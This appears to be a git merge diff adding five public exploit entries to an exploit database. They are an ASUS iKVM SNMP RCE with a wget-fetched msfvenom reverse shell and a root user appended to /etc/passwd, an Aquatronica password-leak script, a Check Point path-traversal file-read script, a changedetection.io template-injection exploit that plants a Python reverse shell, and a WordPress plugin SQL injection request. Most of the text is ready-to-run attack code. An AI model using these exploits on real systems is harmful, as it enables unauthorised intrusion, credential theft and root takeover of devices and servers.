Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/hardware/remote/52033.txt

@@ -0,0 +1,61 @@
+# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access
+# Date: 2023-02-16
+# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023]
+# Vendor Homepage: https://servers.asus.com/search?q=ASMB8
+# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)
+# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl
+# CVE: CVE-2023-26602
+
+++++++++++++++++++++
+0x00 DESCRIPTION
+++++++++++++++++++++
+During a recent engagement, a remote server management interface has been
+discovered. Furthermore, SNMPv2 was found to be enabled, offering write
+access to the private community, subsequently allowing us to introduce
+SNMP arbitrary extensions to achieve RCE.
+We also found a hardcoded account sysadmin:superuser by cracking the
+shadow file (md5crypt) found on the system and identifed an "anonymous"
+user w/ the same password, however a lock seems to be in place to prevent
+using these credentials via SSH (running defshell as default shell).
++++++++++++++++
+0x01 IMPACT
++++++++++++++++
+By exploiting SNMP arbitrary extension, we are able to run any command on
+the system w/ root privileges, and we are able to introduce our own user
+circumventing the defshell restriction for SSH.
++++++++++++++++++++++++++++++++
+0x02 PROOF OF CONCEPT (PoC)
++++++++++++++++++++++++++++++++
+At first, we have to create required extensions on the system, e.g. via
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'
+and if everything is set, we can just run that command by
+snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
+which will execute our defined command and show us its output.
++++++++++++++++++++++++++++++++
+0x03 SSH Remote Root Access
++++++++++++++++++++++++++++++++
+The identified RCE can be used to transfer a reverse tcp shell created
+by msfvenom for arm little-endian, e.g.
+msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin
+We can now transfer the binary, adjust permissions and finally run it:
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'
+Again, we have to request execution of the lines in the MIB via:
+snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
+We get a reverse connection from the host, and can now act on the local system
+to easily echo our own line into /etc/passwd:
+echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd
+By setting the standard shell to /bin/sh, we are able to get a SSH root
+shell into the system, effectively circumventing the defshell restriction.
+$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g
+BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)
+Enter 'help' for a list of built-in commands.
+# uname -a
+Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown
+# uptime
+15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25
+# head -n 1 /etc/shadow
+sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::
+---
+#EOF

exploits/hardware/webapps/52028.py

@@ -0,0 +1,86 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+#
+# Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
+#
+#
+# Vendor: Aquatronica s.r.l.
+# Product web page: https://www.aquatronica.com
+# Affected version: Firmware: 5.1.6
+#                   Web: 2.0
+#
+# Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy
+# to use, allowing you to control all the electrical devices in
+# an aquarium and to monitor all their parameters; it can be used
+# for soft water aquariums, salt water aquariums or both simultaneously.
+#
+# Desc: The tcp.php endpoint on the Aquatronica controller is exposed
+# to unauthenticated attackers over the network. This vulnerability
+# allows remote attackers to send a POST request which can reveal
+# sensitive configuration information, including plaintext passwords.
+# This can lead to unauthorized access and control over the aquarium
+# controller, compromising its security and potentially allowing attackers
+# to manipulate its settings.
+#
+# Tested on: Apache/2.0.54 (Unix)
+#            PHP/5.4.17
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2024-5824
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
+#
+#
+# 04.05.2024
+#
+
+import requests, html, re, sys, time
+from urllib.parse import unquote
+
+program     = "TCP"
+command     = "ws_get_network_cfg"
+function_id = "TCP_XML_REQUEST"
+
+print("""
+      _________         .    .
+     (..       \_    ,  |\  /|
+      \       O  \  /|  \ \/ /
+       \______    \/ |   \  /
+          vvvv\    \ |   /  |
+          \^^^^  ==   \_/   |
+           `\_   ===    \.  |
+           / /\_   \ /      |
+           |/   \_  \|      /
+___ ______________\________/________aquatronica_0day___
+  | |
+  | |
+  | |
+""")
+
+if len(sys.argv) != 2:
+    print("Usage: python aqua.py <ip:port>")
+    sys.exit(1)
+
+ip = sys.argv[1]
+url = f"http://{ip}/{program.lower()}.php"
+
+post_data = {'function_id' : function_id.lower(),
+             'command'     :     command.upper()}
+
+r = requests.post(url, data=post_data)
+
+if r.status_code == 200:
+    r_d = unquote(r.text)
+    f_d_r = html.unescape(r_d)
+    regex = r'pwd="([^"]+)"'
+    rain = re.findall(regex, f_d_r)
+
+    for drops in rain:
+        print(' ',drops)
+        time.sleep(0.5)
+else:
+    print(f"Dry season! {r.status_code}")

exploits/hardware/webapps/52029.py

@@ -0,0 +1,59 @@
+# Exploit Title:  Check Point Security Gateway - Information Disclosure (Unauthenticated)
+# Exploit Author: Yesith Alvarez
+# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
+# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20
+# CVE : CVE-2024-24919
+
+from requests import Request, Session
+import sys
+import json
+
+
+
+def title():
+    print('''
+
+   _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___
+  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \
+ | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
+ | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, |
+ | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / /
+  \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/
+
+
+
+
+Author: Yesith Alvarez
+Github: https://github.com/yealvarez
+Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
+    ''')
+
+def exploit(url, path):
+	url = url + '/clients/MyCRL'
+	data = 	"aCSHELL/../../../../../../../../../../.."+ path
+	headers = {
+		'Connection': 'keep-alive',
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'
+	}
+	s = Session()
+	req = Request('POST', url, data=data, headers=headers)
+	prepped = req.prepare()
+	#del prepped.headers['Content-Type']
+	resp = s.send(prepped,
+	    verify=False,
+	    timeout=15
+	)
+	print(prepped.headers)
+	print(url)
+	print(resp.headers)
+	print(resp.status_code)
+
+
+if __name__ == '__main__':
+    title()
+    if(len(sys.argv) < 3):
+    	print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))
+    	print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))
+    	exit(0)
+    else:
+    	exploit(sys.argv[1],sys.argv[2])

exploits/multiple/webapps/52027.py

@@ -0,0 +1,125 @@
+# Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)
+# Date: 5-26-2024
+# Exploit Author: Zach Crosman (zcrosman)
+# Vendor Homepage: changedetection.io
+# Software Link: https://github.com/dgtlmoon/changedetection.io
+# Version: <= 0.45.20
+# Tested on: Linux
+# CVE : CVE-2024-32651
+
+from pwn import *
+import requests
+from bs4 import BeautifulSoup
+import argparse
+
+def start_listener(port):
+    listener = listen(port)
+    print(f"Listening on port {port}...")
+    conn = listener.wait_for_connection()
+    print("Connection received!")
+    context.newline = b'\r\n'
+    # Switch to interactive mode
+    conn.interactive()
+
+def add_detection(url, listen_ip, listen_port, notification_url=''):
+    session = requests.Session()
+
+    # First request to get CSRF token
+    request1_headers = {
+        "Cache-Control": "max-age=0",
+        "Upgrade-Insecure-Requests": "1",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
+        "Accept-Encoding": "gzip, deflate",
+        "Accept-Language": "en-US,en;q=0.9",
+        "Connection": "close"
+    }
+
+    response = session.get(url, headers=request1_headers)
+    soup = BeautifulSoup(response.text, 'html.parser')
+    csrf_token = soup.find('input', {'name': 'csrf_token'})['value']
+    print(f'Obtained CSRF token: {csrf_token}')
+
+    # Second request to submit the form and get the redirect URL
+    add_url = f"{url}/form/add/quickwatch"
+    add_url_headers = {  # Define add_url_headers here
+        "Origin": url,
+        "Content-Type": "application/x-www-form-urlencoded"
+    }
+    add_url_data = {
+        "csrf_token": csrf_token,
+        "url": "https://reddit.com/r/baseball",
+        "tags": '',
+        "edit_and_watch_submit_button": "Edit > Watch",
+        "processor": "text_json_diff"
+    }
+
+    post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False)
+
+    # Extract the URL from the Location header
+    if 'Location' in post_response.headers:
+        redirect_url = post_response.headers['Location']
+        print(f'Redirect URL: {redirect_url}')
+    else:
+        print('No redirect URL found')
+        return
+
+    # Third request to add the changedetection url with ssti in notification config
+    save_detection_url = f"{url}{redirect_url}"
+    save_detection_headers = {  # Define save_detection_headers here
+        "Referer": redirect_url,
+        "Cookie": f"session={session.cookies.get('session')}"
+    }
+
+    save_detection_data = {
+        "csrf_token": csrf_token,
+        "url": "https://reddit.com/r/all",
+        "title": '',
+        "tags": '',
+        "time_between_check-weeks": '',
+        "time_between_check-days": '',
+        "time_between_check-hours": '',
+        "time_between_check-minutes": '',
+        "time_between_check-seconds": '30',
+        "filter_failure_notification_send": 'y',
+        "fetch_backend": 'system',
+        "webdriver_delay": '',
+        "webdriver_js_execute_code": '',
+        "method": 'GET',
+        "headers": '',
+        "body": '',
+        "notification_urls": notification_url,
+        "notification_title": '',
+        "notification_body": f"""
+        {{% for x in ().__class__.__base__.__subclasses__() %}}
+        {{% if "warning" in x.__name__ %}}
+        {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}
+        {{% endif %}}
+        {{% endfor %}}
+        """,
+        "notification_format": 'System default',
+        "include_filters": '',
+        "subtractive_selectors": '',
+        "filter_text_added": 'y',
+        "filter_text_replaced": 'y',
+        "filter_text_removed": 'y',
+        "trigger_text": '',
+        "ignore_text": '',
+        "text_should_not_be_present": '',
+        "extract_text": '',
+        "save_button": 'Save'
+    }
+    final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data)
+
+    print('Final request made.')
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Add detection and start listener')
+    parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')
+    parser.add_argument('--port', type=int, help='Port for the listener', default=4444)
+    parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')
+    parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default')
+    args = parser.parse_args()
+
+
+    add_detection(args.url, args.ip, args.port, args.notification)
+    start_listener(args.port)

exploits/php/webapps/52024.txt

@@ -0,0 +1,47 @@
+Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection
+Date: 14 Apr 2024
+Exploit Author: Ivan Spiridonov (xbz0n)
+Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135
+Version: 2.0.3
+Tested on: Ubuntu 20.04
+CVE: CVE-2024-32136
+
+SQL Injection
+
+SQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
+
+Affected Components
+
+Plugin: BWL Advanced FAQ Manager
+Version: 2.0.3
+Affected Parameter: 'date_range'
+Affected Page: /wp-admin/edit.php
+Description
+
+The vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter.
+
+Proof of Concept
+
+Manual Exploitation
+
+The following GET request demonstrates the vulnerability:
+
+GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics
+Connection: close
+Cookie: [Relevant Cookies]
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.
+
+Recommendations
+
+BWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.